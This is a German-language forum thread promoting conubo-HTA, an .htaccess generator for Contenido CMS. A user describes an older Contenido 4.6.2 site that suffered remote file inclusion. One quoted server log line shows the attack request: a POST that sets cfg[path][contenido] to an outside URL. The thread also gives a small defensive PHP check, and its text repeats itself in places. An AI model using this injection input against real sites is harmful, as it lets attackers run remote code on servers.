In der Vergangenheit kam es häufig vor, dass durch ein direktes Aufrufen von PHP-Dateien ungewünschte Aktivitäten seitens der Webanwendung ausgeführt wurden, z.B. durch URL-Injection.
conubo-HTA.lite (in der Version für Contenido) versucht dies durch das automatische Anlegen von so genannten .htaccess Dateien, die den Zugriff auf bestimmte Verzeichnisse und Dateien steuern, zu verhindern.
Weitere Informationen und den kostenlosen download findet Ihr auf www.conubo.net unter dem Menüpunkt "HTA"
Wenn Ihr noch Ideen oder Vorschläge habt um diesen Schutz noch zu erweitern, dann sendet mir doch bitte einfach eine Mail.
Emailadresse findet Ihr auf der conubo-Website.
Gruss
boeckers
.htaccess Dateien Generator zum Schutz für Contenido
Hallo zusammen,
ich habe am Montag den conuboHTA auf einer Contenido Installation eines Kunden, der noch Contenido 4.6.2 hat, installiert. Diese Installation soll auf Wunsch des Kunden nicht upgedatet werden.
Die Website hatte jedoch starke Probleme mit URL Injection.2 Hier insbesondere betroffen die Datei include.rights_subnav.php im contenido/includes Verz. Die Datei hatte zwar schon ein Fix (siehe Code), jedoch hielt es die Hacker nicht von der URL Injection per POST cfg ab.
[29/Apr/2008:22:39:24 +0200] "POST //contenido/includes/include.rights_subnav.php?cfg[path][contenido]=http://www.geocities.com/****? HTTP/1.1" 200 5
Jetzt, nach der Installation des conuboHTA wurden zwar noch - laut Serverlogs - Versuche einer URL Injection unternommen, doch Dank conuboHTA wurden diese erfolgreich verhindert.
Die Installation ist einfach und selbstklärend und lässt sich innerhalb von wenigen Minuten ausführen. Für ein sichereres Contenido - alleine schon auf Grund des hta Passwords auf dem Contenido Verz - auf jeden Fall eine Empfehlung Wert. Besonders eben bei älteren Contenido Installationen.
ich habe am Montag den conuboHTA auf einer Contenido Installation eines Kunden, der noch Contenido 4.6.2 hat, installiert. Diese Installation soll auf Wunsch des Kunden nicht upgedatet werden.
Die Website hatte jedoch starke Probleme mit URL Injection.2 Hier insbesondere betroffen die Datei include.rights_subnav.php im contenido/includes Verz. Die Datei hatte zwar schon ein Fix (siehe Code), jedoch hielt es die Hacker nicht von der URL Injection per POST cfg ab.
Code: Alles auswählen
if ($_GET["cfg"] || $_POST["cfg"])
{
die();
}
if ($_REQUEST["cfg"] )
{
die();
}
Jetzt, nach der Installation des conuboHTA wurden zwar noch - laut Serverlogs - Versuche einer URL Injection unternommen, doch Dank conuboHTA wurden diese erfolgreich verhindert.
Die Installation ist einfach und selbstklärend und lässt sich innerhalb von wenigen Minuten ausführen. Für ein sichereres Contenido - alleine schon auf Grund des hta Passwords auf dem Contenido Verz - auf jeden Fall eine Empfehlung Wert. Besonders eben bei älteren Contenido Installationen.